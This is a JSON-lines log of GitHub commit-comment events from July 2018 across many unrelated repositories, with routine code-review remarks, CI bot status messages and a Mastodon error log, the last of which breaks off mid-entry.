{"id":"7994065693","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29776779,"position":738,"line":533,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-20T09:55:17Z","updated_at":"2018-07-20T09:55:17Z","author_association":"CONTRIBUTOR","body":"Broken link"}},"created_at":"2018-07-20T09:55:17Z"}
{"id":"7994066260","type":"CommitCommentEvent","actor":{"login":"MrErikDev"},"repo":{"name":"MrErikDev/treble_experimentations"},"payload":{"comment":{"id":29776781,"position":null,"line":null,"path":null,"commit_id":"a5e1b285cb3a3c0430a85b2ad8db16cbee3328f5","created_at":"2018-07-20T09:55:24Z","updated_at":"2018-07-20T09:55:24Z","author_association":"OWNER","body":"aospa)\r\n+\t\t mainrepo=\"https://github.com/AOSPA/manifest\"\r\n+\t\t mainbranch=\"oreo-mr1\"\r\n+\t\t localManifestBranch=\"android-8.1\"\r\n+\t\t treble_generate=\"aospa\"\r\n+\t\t extra_make_options=\"WITHOUT_CHECK_API=true\"\r\n+\t\t ;;"}},"created_at":"2018-07-20T09:55:24Z"}
{"id":"7994074341","type":"CommitCommentEvent","actor":{"login":"yetoneya92"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29776791,"position":59,"line":59,"path":"StudentIQTest-shell/pom.xml","commit_id":"3190fddc38e9a457f3a2c6254fbe222114b7eca7","created_at":"2018-07-20T09:57:02Z","updated_at":"2018-07-20T09:57:02Z","author_association":"OWNER","body":"здесь лишние зависимости, я хотела language в файл yml записать, но не вышло, почему-то при попытке записать содержимое файла стиралось, забыла зависимости убрать"}},"created_at":"2018-07-20T09:57:02Z"}
{"id":"7994076865","type":"CommitCommentEvent","actor":{"login":"lihuihui123456"},"repo":{"name":"lihuihui123456/test1"},"payload":{"comment":{"id":29776799,"position":null,"line":null,"path":null,"commit_id":"6daf731bf824feccc6e294c56eb2b2b3d6079f99","created_at":"2018-07-20T09:57:32Z","updated_at":"2018-07-20T09:57:32Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-20T09:57:32Z"}
{"id":"7994079726","type":"CommitCommentEvent","actor":{"login":"yetoneya92"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29776805,"position":69,"line":69,"path":"StudentIQTest-shell/pom.xml","commit_id":"3190fddc38e9a457f3a2c6254fbe222114b7eca7","created_at":"2018-07-20T09:58:06Z","updated_at":"2018-07-20T09:58:06Z","author_association":"OWNER","body":"да я их убираю, а они вставляются сами. в следующем задании убрала"}},"created_at":"2018-07-20T09:58:06Z"}
{"id":"7994080636","type":"CommitCommentEvent","actor":{"login":"vdanielpop"},"repo":{"name":"lifaon74/events-polyfill"},"payload":{"comment":{"id":29776809,"position":null,"line":null,"path":null,"commit_id":"b6ce5de5f352541bc1660ea9b34498be79284e41","created_at":"2018-07-20T09:58:16Z","updated_at":"2018-07-20T09:58:16Z","author_association":"NONE","body":"It looks like there's a typo in here, in the if() clause, right?\r\nShouldn't it be **rotationDescriptor** instead of **rotationDescriptior** ?"}},"created_at":"2018-07-20T09:58:16Z"}
{"id":"7994081543","type":"CommitCommentEvent","actor":{"login":"lihuihui123456"},"repo":{"name":"lihuihui123456/test1"},"payload":{"comment":{"id":29776811,"position":null,"line":null,"path":null,"commit_id":"2ba81583bcc9d1b211e359938317bcef8127c180","created_at":"2018-07-20T09:58:26Z","updated_at":"2018-07-20T09:58:26Z","author_association":"OWNER","body":"222"}},"created_at":"2018-07-20T09:58:26Z"}
{"id":"7994082411","type":"CommitCommentEvent","actor":{"login":"yetoneya92"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29776815,"position":74,"line":74,"path":"StudentIQTest-shell/pom.xml","commit_id":"3190fddc38e9a457f3a2c6254fbe222114b7eca7","created_at":"2018-07-20T09:58:36Z","updated_at":"2018-07-20T09:58:36Z","author_association":"OWNER","body":"тоже без спросу вставилось, убрала уже"}},"created_at":"2018-07-20T09:58:36Z"}
{"id":"7994084494","type":"CommitCommentEvent","actor":{"login":"mdoering"},"repo":{"name":"Sp2000/colplus-backend"},"payload":{"comment":{"id":29776821,"position":11,"line":46,"path":"colplus-dao/src/main/java/org/col/db/dao/TaxonDao.java","commit_id":"7cd1248d69fb0d2dd3cee9f0b7ed03604c7143ba","created_at":"2018-07-20T09:59:00Z","updated_at":"2018-07-20T09:59:00Z","author_association":"COLLABORATOR","body":"Also tests like PgImportIT.testAcef0 fail now"}},"created_at":"2018-07-20T09:59:00Z"}
{"id":"7994088784","type":"CommitCommentEvent","actor":{"login":"yetoneya92"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29776838,"position":34,"line":34,"path":"StudentIQTest-shell/src/test/java/ru/otus/elena/studentiqtest/iqtest/IQTestImplTest.java","commit_id":"3190fddc38e9a457f3a2c6254fbe222114b7eca7","created_at":"2018-07-20T09:59:53Z","updated_at":"2018-07-20T09:59:53Z","author_association":"OWNER","body":"хорошо"}},"created_at":"2018-07-20T09:59:53Z"}
{"id":"7997680861","type":"CommitCommentEvent","actor":{"login":"alalba221"},"repo":{"name":"alalba221/XPlay"},"payload":{"comment":{"id":29786124,"position":null,"line":null,"path":null,"commit_id":"da16cc67e79d72948628700bab12b68f47425339","created_at":"2018-07-21T00:00:49Z","updated_at":"2018-07-21T00:00:49Z","author_association":"OWNER","body":"Open video decoder"}},"created_at":"2018-07-21T00:00:49Z"}
{"id":"7997681276","type":"CommitCommentEvent","actor":{"login":"danoscarmike"},"repo":{"name":"GoogleCloudPlatform/google-cloud-java"},"payload":{"comment":{"id":29786125,"position":null,"line":null,"path":null,"commit_id":"132973855c5f407a739da3d98a04f0f1c20eb9f7","created_at":"2018-07-21T00:01:01Z","updated_at":"2018-07-21T00:01:01Z","author_association":"MEMBER","body":"@garrettjonesgoogle I was opening a PR and literally fat fingered the keyboard committing directly to master.  If I recall you were going to set up some protection against this."}},"created_at":"2018-07-21T00:01:01Z"}
{"id":"7997682039","type":"CommitCommentEvent","actor":{"login":"Srichon"},"repo":{"name":"aceat64/EasyBitcoin-PHP"},"payload":{"comment":{"id":29786126,"position":87,"line":117,"path":"easybitcoin.php","commit_id":"687d42fe238add88e2d89570525c2a07149d593d","created_at":"2018-07-21T00:01:22Z","updated_at":"2018-07-21T00:01:22Z","author_association":"NONE","body":"curlopt_returntransfer"}},"created_at":"2018-07-21T00:01:22Z"}
{"id":"7997689828","type":"CommitCommentEvent","actor":{"login":"ubiyca5"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29786141,"position":37,"line":37,"path":"lesson_1/discriminant.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-21T00:05:30Z","updated_at":"2018-07-21T00:05:30Z","author_association":"OWNER","body":"исправил код теперь валидный Rubocop"}},"created_at":"2018-07-21T00:05:30Z"}
{"id":"7997689959","type":"CommitCommentEvent","actor":{"login":"ubiyca5"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29786142,"position":36,"line":36,"path":"lesson_1/discriminant.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-21T00:05:34Z","updated_at":"2018-07-21T00:05:34Z","author_association":"OWNER","body":"исправил код теперь валидный Rubocop"}},"created_at":"2018-07-21T00:05:34Z"}
{"id":"7997692128","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29786145,"position":null,"line":null,"path":null,"commit_id":"263f102860a265024716dba3393f8d8369606b6a","created_at":"2018-07-21T00:06:51Z","updated_at":"2018-07-21T00:06:51Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-157](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-157).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-157-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-21T00:06:51Z"}
{"id":"7997692350","type":"CommitCommentEvent","actor":{"login":"ubiyca5"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29786146,"position":56,"line":56,"path":"lesson_1/right_triangle.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-21T00:06:58Z","updated_at":"2018-07-21T00:06:58Z","author_association":"OWNER","body":"могу закоментить свой код (оставить в теле) и переписать на данную конструкцию!\r\nПереписать?"}},"created_at":"2018-07-21T00:06:58Z"}
{"id":"7997694623","type":"CommitCommentEvent","actor":{"login":"peter-madigan"},"repo":{"name":"peter-madigan/reco3d"},"payload":{"comment":{"id":29786150,"position":null,"line":null,"path":null,"commit_id":"e85c219701626b822930a945f5215c68e478dd68","created_at":"2018-07-21T00:08:21Z","updated_at":"2018-07-21T00:08:21Z","author_association":"OWNER","body":"[CodeFactor](https://www.codefactor.io/repository/github/peter-madigan/reco3d/overview/peter-madigan/issue5-implement-larpix-processes) found an issue: Trailing newlines\n\nIt's currently on:\n[tests\\test_processes\\test_basic_processes.py:21\n](https://www.codefactor.io/repository/github/peter-madigan/reco3d/source/peter-madigan issue5-implement-larpix-processes/tests/test_processes/test_basic_processes.py#L21)Commit e85c219701626b822930a945f5215c68e478dd68"}},"created_at":"2018-07-21T00:08:21Z"}
{"id":"7997695612","type":"CommitCommentEvent","actor":{"login":"GutierrezDev"},"repo":{"name":"slashmax/AAMirror"},"payload":{"comment":{"id":29786151,"position":null,"line":null,"path":null,"commit_id":"d76f6d97fcb41ddff4197dc5744d4a9b3e5622f3","created_at":"2018-07-21T00:08:57Z","updated_at":"2018-07-21T00:08:57Z","author_association":"NONE","body":"This one works but I don't know why  I need to re apply the unlock and restart the phone daily. I used it yesterday and this today needed to do the steps. It works well but doing the same process again "}},"created_at":"2018-07-21T00:08:57Z"}
{"id":"7997696818","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29786152,"position":null,"line":null,"path":null,"commit_id":"7126e06fdda596abd070ec4e0dbbccf5e4f00cfa","created_at":"2018-07-21T00:09:37Z","updated_at":"2018-07-21T00:09:37Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/92/display/redirect) (on internal Jenkins) failed in stage 'Test docs' 🔥\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/92//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/7126e06fdda596abd070ec4e0dbbccf5e4f00cfa/92/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/7126e06fdda596abd070ec4e0dbbccf5e4f00cfa/92/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/7126e06fdda596abd070ec4e0dbbccf5e4f00cfa/92/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/7126e06fdda596abd070ec4e0dbbccf5e4f00cfa/92/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-21T00:09:37Z"}
{"id":"7997697997","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29786155,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-21T00:10:13Z","updated_at":"2018-07-21T00:10:13Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-21T00:10:13Z"}
{"id":"7997699021","type":"CommitCommentEvent","actor":{"login":"v-dobrev"},"repo":{"name":"CEED/libCEED"},"payload":{"comment":{"id":29786160,"position":9,"line":12,"path":".astylerc","commit_id":"a0cb4bfa24d67a987dcf6d4283f7807efb850fa4","created_at":"2018-07-21T00:10:49Z","updated_at":"2018-07-21T00:10:49Z","author_association":"MEMBER","body":"I see that this file is actually not used by the `style` makefile target.\r\n\r\nDo we want to remove it, or do we want to use it in the makefile?"}},"created_at":"2018-07-21T00:10:49Z"}
{"id":"7997699925","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29786165,"position":null,"line":null,"path":null,"commit_id":"780b9cb085ca504cde9e88966e40f898205b87b3","created_at":"2018-07-21T00:11:19Z","updated_at":"2018-07-21T00:11:19Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-160](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-160).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-160-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-21T00:11:19Z"}
{"id":"7997701088","type":"CommitCommentEvent","actor":{"login":"PWRcoin"},"repo":{"name":"PWRcoin/PWRcoin"},"payload":{"comment":{"id":29786168,"position":null,"line":null,"path":null,"commit_id":"b0a617b6ed663a9fe823731096a483a11e260019","created_at":"2018-07-21T00:12:03Z","updated_at":"2018-07-21T00:12:03Z","author_association":"OWNER","body":"Recommend this be applied to Phoenix = 10000000000  (10 million will get 30-40 years.)  Checkpoints are obsolete, but this will prevent errors in the future."}},"created_at":"2018-07-21T00:12:03Z"}
{"id":"7997702575","type":"CommitCommentEvent","actor":{"login":"hanswang"},"repo":{"name":"amanda-lan/UserLoginService"},"payload":{"comment":{"id":29786169,"position":32,"line":27,"path":"www/insert.php","commit_id":"fd4e6148e48e4dc0e3e1c9f5f299e7a132fb6601","created_at":"2018-07-21T00:12:54Z","updated_at":"2018-07-21T00:12:54Z","author_association":"NONE","body":"Before insert, you need to check username is uniquely new on db."}},"created_at":"2018-07-21T00:12:54Z"}
{"id":"7997702891","type":"CommitCommentEvent","actor":{"login":"hsmith40"},"repo":{"name":"SurferTim/documentation"},"payload":{"comment":{"id":29786170,"position":null,"line":null,"path":null,"commit_id":"6bc583965254fa292a470990c40b145f553f6b34","created_at":"2018-07-21T00:13:06Z","updated_at":"2018-07-21T00:13:06Z","author_association":"NONE","body":"I have tried this 3 times and it just doesn't work.  I am using Stretch 2.8 on a Raspberry Pi 3B.  After I downloaded hostapd and dnsmasq, I killed the wifi.  I did the update using keyboard, mouse and monitor.\r\n\r\nI will send you any info I have.\r\nThanks,\r\n\r\nHenry Smith"}},"created_at":"2018-07-21T00:13:06Z"}
{"id":"7997704634","type":"CommitCommentEvent","actor":{"login":"hanswang"},"repo":{"name":"amanda-lan/UserLoginService"},"payload":{"comment":{"id":29786171,"position":3,"line":3,"path":"www/insert.php","commit_id":"fd4e6148e48e4dc0e3e1c9f5f299e7a132fb6601","created_at":"2018-07-21T00:14:08Z","updated_at":"2018-07-21T00:14:08Z","author_association":"NONE","body":"better use require_once "}},"created_at":"2018-07-21T00:14:08Z"}
{"id":"7997705440","type":"CommitCommentEvent","actor":{"login":"tatianelucia"},"repo":{"name":"tatianelucia/tatiane_teste"},"payload":{"comment":{"id":29786172,"position":null,"line":null,"path":null,"commit_id":"e533b50a2dd8560513077ee97688c208e3c261ee","created_at":"2018-07-21T00:14:37Z","updated_at":"2018-07-21T00:14:37Z","author_association":"OWNER","body":"testeSQL"}},"created_at":"2018-07-21T00:14:37Z"}
{"id":"7997705526","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29786173,"position":null,"line":null,"path":null,"commit_id":"baceb8693d268c14bea7cdbe419d9d434f26c95c","created_at":"2018-07-21T00:14:40Z","updated_at":"2018-07-21T00:14:40Z","author_association":"NONE","body":"This could be tested as simplification"}},"created_at":"2018-07-21T00:14:40Z"}
{"id":"7997706565","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29786176,"position":null,"line":null,"path":null,"commit_id":"414c5c543860947bc43dd1cc523ea62704fdcc99","created_at":"2018-07-21T00:15:14Z","updated_at":"2018-07-21T00:15:14Z","author_association":"COLLABORATOR","body":"Also see [Issue 690](https://github.com/weidai11/cryptopp/issues/690)."}},"created_at":"2018-07-21T00:15:14Z"}
{"id":"7997709401","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29786182,"position":null,"line":null,"path":null,"commit_id":"baceb8693d268c14bea7cdbe419d9d434f26c95c","created_at":"2018-07-21T00:17:00Z","updated_at":"2018-07-21T00:17:00Z","author_association":"OWNER","body":"OK. Resubmitted"}},"created_at":"2018-07-21T00:17:00Z"}
{"id":"7997710994","type":"CommitCommentEvent","actor":{"login":"dubzzz"},"repo":{"name":"dubzzz/javascript-algorithms"},"payload":{"comment":{"id":29786185,"position":null,"line":null,"path":null,"commit_id":"d6b1a6cd4b1ac736968ab81ae997334a18ae3045","created_at":"2018-07-21T00:18:01Z","updated_at":"2018-07-21T00:18:01Z","author_association":"OWNER","body":"Issue opened in the official repository regarding the flakiness of *should find a match [property]*\r\nSee https://github.com/trekhleb/javascript-algorithms/issues/102"}},"created_at":"2018-07-21T00:18:01Z"}
{"id":"7997711782","type":"CommitCommentEvent","actor":{"login":"jedbrown"},"repo":{"name":"CEED/libCEED"},"payload":{"comment":{"id":29786186,"position":9,"line":12,"path":".astylerc","commit_id":"a0cb4bfa24d67a987dcf6d4283f7807efb850fa4","created_at":"2018-07-21T00:18:31Z","updated_at":"2018-07-21T00:18:31Z","author_association":"MEMBER","body":"`align=pointer=name` is the only acceptable choice and the way it was original written. The style was corrupted in 69762e1fd0661d60455d5234cf3bd835249a295e, but at the time, we did not insist on cleaning up the branch to avoid spurious churn.\r\n\r\nI indent preproc conditionals as\r\n\r\n```c\r\n#if FOO\r\n#  define BAR\r\n#endif\r\n```\r\nbecause anything else is hard to read if you have nested preproc conditionals. Fortunately we don't have many in libCEED."}},"created_at":"2018-07-21T00:18:31Z"}
{"id":"7997712109","type":"CommitCommentEvent","actor":{"login":"quangogage"},"repo":{"name":"quangogage/Soundcloud-Rapper-Simulator"},"payload":{"comment":{"id":29786187,"position":null,"line":null,"path":null,"commit_id":"d6e8a5b3e6226289217e502e33a746000060f934","created_at":"2018-07-21T00:18:44Z","updated_at":"2018-07-21T00:18:44Z","author_association":"OWNER","body":"Inside of CloutHandler, every frame I: \r\n  • iterate over all of the upgrades the user owns, multiply how many you own by their cps\r\n  • Multiply that by the time since the last frame (in seconds)\r\n  • Add the result of that to the current amount of clout.\r\n  \r\nInside of DataHandler I changed it from storing in localstorage every time you change a value, to a set interval. Idk if this is better or not, I was running into an issue with the clout storage and thought this would solve it. Honestly I think it would be faster and lighter on the browser to revert it the old way but not something to worry about at the moment. \r\n"}},"created_at":"2018-07-21T00:18:44Z"}
{"id":"7997715553","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29786193,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-21T00:20:59Z","updated_at":"2018-07-21T00:20:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-21T00:20:59Z"}
{"id":"7997716964","type":"CommitCommentEvent","actor":{"login":"taserz"},"repo":{"name":"taserz/S9-Volt-Rocket-Ship"},"payload":{"comment":{"id":29786196,"position":null,"line":null,"path":null,"commit_id":"3b202be577d2bbc67146fbc8c336fe1f634f8f24","created_at":"2018-07-21T00:21:51Z","updated_at":"2018-07-21T00:21:51Z","author_association":"OWNER","body":"platform gcc"}},"created_at":"2018-07-21T00:21:51Z"}
{"id":"7997719201","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29786198,"position":null,"line":null,"path":null,"commit_id":"19b07a86c03c40550a6513f38be8105e7da28731","created_at":"2018-07-21T00:23:14Z","updated_at":"2018-07-21T00:23:14Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.358`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/406476610) :tada:"}},"created_at":"2018-07-21T00:23:14Z"}
{"id":"7997722074","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29786200,"position":null,"line":null,"path":null,"commit_id":"3655e99c984000db78c3c57ec1ecd5a7cfc0e087","created_at":"2018-07-21T00:25:08Z","updated_at":"2018-07-21T00:25:08Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-161](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-161).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-161-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-21T00:25:08Z"}
{"id":"7997728504","type":"CommitCommentEvent","actor":{"login":"ak239"},"repo":{"name":"eyqs/ndb"},"payload":{"comment":{"id":29786213,"position":7,"line":126,"path":"front_end/ndb/NdbMain.js","commit_id":"837cd6477300a62638b25d809f131dbe9a0198bf","created_at":"2018-07-21T00:29:15Z","updated_at":"2018-07-21T00:29:15Z","author_association":"NONE","body":"best JS practices:\r\nconst [nddService, cloudDebugService] = await Promise.all([Ndb.serviceManager.create('ndd_service'), Ndb.serviceManager.create('cloud_debug_service')]);"}},"created_at":"2018-07-21T00:29:15Z"}
{"id":"7997730459","type":"CommitCommentEvent","actor":{"login":"charris"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29786221,"position":null,"line":null,"path":null,"commit_id":"cd530708178788aa3f6edb2df4acbc1daf29af69","created_at":"2018-07-21T00:30:32Z","updated_at":"2018-07-21T00:30:32Z","author_association":"CONTRIBUTOR","body":"Let's try revert this and see if that fixes things."}},"created_at":"2018-07-21T00:30:32Z"}
{"id":"7997730753","type":"CommitCommentEvent","actor":{"login":"ak239"},"repo":{"name":"eyqs/ndb"},"payload":{"comment":{"id":29786222,"position":39,"line":212,"path":"front_end/ndb/NdbMain.js","commit_id":"837cd6477300a62638b25d809f131dbe9a0198bf","created_at":"2018-07-21T00:30:42Z","updated_at":"2018-07-21T00:30:42Z","author_association":"NONE","body":"I believe that we should decouple debuggee and process instances as much as possible and here create suitable connection."}},"created_at":"2018-07-21T00:30:42Z"}
{"id":"7997732965","type":"CommitCommentEvent","actor":{"login":"ak239"},"repo":{"name":"eyqs/ndb"},"payload":{"comment":{"id":29786225,"position":82,"line":306,"path":"front_end/ndb/NdbMain.js","commit_id":"837cd6477300a62638b25d809f131dbe9a0198bf","created_at":"2018-07-21T00:32:05Z","updated_at":"2018-07-21T00:32:05Z","author_association":"NONE","body":"we are not throwing exceptions on frontend side, just silently ignore this error or dump console.error."}},"created_at":"2018-07-21T00:32:05Z"}
{"id":"7997735275","type":"CommitCommentEvent","actor":{"login":"ryotayama"},"repo":{"name":"ryotayama/Hayaemon_Web"},"payload":{"comment":{"id":29786229,"position":null,"line":null,"path":null,"commit_id":"d1df39f2f1c251ee86559b88029b42c3f368140f","created_at":"2018-07-21T00:33:35Z","updated_at":"2018-07-21T00:33:35Z","author_association":"OWNER","body":"確認しました！　一部要確認のファイルはありますが、以下◆不要ファイルは削除していいと思います₍₍ (ง*ᐛ)ว ⁾⁾\n\n◆不要ファイル\ndownload.html\ndownload_en.html\nscreenshot.html\nscreenshot1.html\nscreenshot2.html\nscreenshot3.html\nspec.html\nsyoukai.html\ntest.html\ntest2.html\nthanks2.html\n\n◆残すファイル\nmaintenance.html\n\n◆要確認\nhistory.html\ntmp_conf.html\ntmp_err1.html\ntmp_err2.html\ntmp_thx.html"}},"created_at":"2018-07-21T00:33:35Z"}
{"id":"7997735560","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29786230,"position":null,"line":null,"path":null,"commit_id":"412bb3596dfad0804fd737b6fbe682dd6251d9f4","created_at":"2018-07-21T00:33:47Z","updated_at":"2018-07-21T00:33:47Z","author_association":"COLLABORATOR","body":"<h3>remove checked state from Checkbox</h3>\n\nPreview: <strong><a href='https://18733-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18733-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18733-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-21T00:33:47Z"}
{"id":"7997737389","type":"CommitCommentEvent","actor":{"login":"ak239"},"repo":{"name":"eyqs/ndb"},"payload":{"comment":{"id":29786232,"position":24,"line":24,"path":"front_end/ndb_ui/CloudDebuggees.js","commit_id":"837cd6477300a62638b25d809f131dbe9a0198bf","created_at":"2018-07-21T00:34:57Z","updated_at":"2018-07-21T00:34:57Z","author_association":"NONE","body":"Most likely 99% of users would have only one key file so I think we do not need tree view here and can just use much simpler ListView, you can take a look [IsolateSelector.js](https://cs.chromium.org/chromium/src/third_party/blink/renderer/devtools/front_end/profiler/IsolateSelector.js?rcl=036438089d99d45c6b472cef75f77d9167eecbe0&l=16) for example.\r\nIn case if my assumption is wrong I think combobox to select key file on top of this view would be better then tree view."}},"created_at":"2018-07-21T00:34:57Z"}
{"id":"7997740465","type":"CommitCommentEvent","actor":{"login":"ak239"},"repo":{"name":"eyqs/ndb"},"payload":{"comment":{"id":29786234,"position":5,"line":16,"path":"package.json","commit_id":"837cd6477300a62638b25d809f131dbe9a0198bf","created_at":"2018-07-21T00:37:04Z","updated_at":"2018-07-21T00:37:04Z","author_association":"NONE","body":"just wondering, why this linking is better then adding dependency on these packages?"}},"created_at":"2018-07-21T00:37:04Z"}
{"id":"7997740646","type":"CommitCommentEvent","actor":{"login":"yyccQQu"},"repo":{"name":"yyccQQu/test"},"payload":{"comment":{"id":29786235,"position":null,"line":null,"path":null,"commit_id":"c1e1393b6414723c794913bcf4ecaf4304a9225e","created_at":"2018-07-21T00:37:11Z","updated_at":"2018-07-21T00:37:11Z","author_association":"OWNER","body":"reload全部，不是热跟新"}},"created_at":"2018-07-21T00:37:11Z"}
{"id":"7997741270","type":"CommitCommentEvent","actor":{"login":"Srichon"},"repo":{"name":"github/opensource.guide"},"payload":{"comment":{"id":29786236,"position":4,"line":11,"path":"_articles/de/metrics.md","commit_id":"87b1c0dfc3065acb648d0afa2dcec3aef2565431","created_at":"2018-07-21T00:37:37Z","updated_at":"2018-07-21T00:37:37Z","author_association":"NONE","body":"aktivitat"}},"created_at":"2018-07-21T00:37:37Z"}
{"id":"7997742059","type":"CommitCommentEvent","actor":{"login":"jebuskrust"},"repo":{"name":"tootsuite/mastodon"},"payload":{"comment":{"id":29786238,"position":null,"line":null,"path":null,"commit_id":"32a4b524fb95799cfebd9a9e76ef42019d22c5f1","created_at":"2018-07-21T00:38:11Z","updated_at":"2018-07-21T00:38:11Z","author_association":"NONE","body":"Found a oopsi woopsi. Hopefully this doesn't bring your day down because you're awesome.\r\n\r\n```\r\nJul 20 17:16:23 localhost bundle[3530]: [249a4c69-affe-403b-812b-3b767c5119de] method=GET path=/auth/confirmation format=html controller=Auth::ConfirmationsController action=show status=500 error='NoMethodError: undefined method `exchange' for #<Resolv::DNS::Resource::IN::A:0x00005640d5425628>' duration=307.99 view=0.00 db=42.98\r\nJul 20 17:16:23 localhost bundle[3530]: [249a4c69-affe-403b-812b-3b767c5119de]\r\nJul 20 17:16:23 localhost bundle[3530]: [249a4c69-affe-403b-812b-3b767c5119de] NoMethodError (undefined method `exchange' for #<Resolv::DNS::Resource::IN::A:0x00005640d5425628>):\r\nJul 20 17:16:23 localhost bundle[3530]: [249a4c69-affe-403b-812b-3b767c5119de]\r\nJul 20 17:16:23 localhost bundle[3530]: [249a4c69-affe-403b-812b-3b767c5119de] app/validators/email_mx_validator.rb:19:in `block in invalid_mx?'\r\nJul 20 17:16:23 localhost bundle[3530]: [249a4c69-affe-403b-812b-3b767c5119de] app/validators/email_mx_validator.rb:19:in `map'\r\nJul 20 17:16:23 localhost bundle[3530]: [249a4c69-affe-403b-812b-3b767c5119de] app/validators/email_mx_validator.rb:19:in `invalid_mx?'\r\nJul 20 17:16:23 localhost bundle[3530]: [249a4c69-affe-403b-812b-3b767c5119de] app/validators/email_mx_validator.rb:8:in `validate'\r\nJul 20 17:16:23 localhost 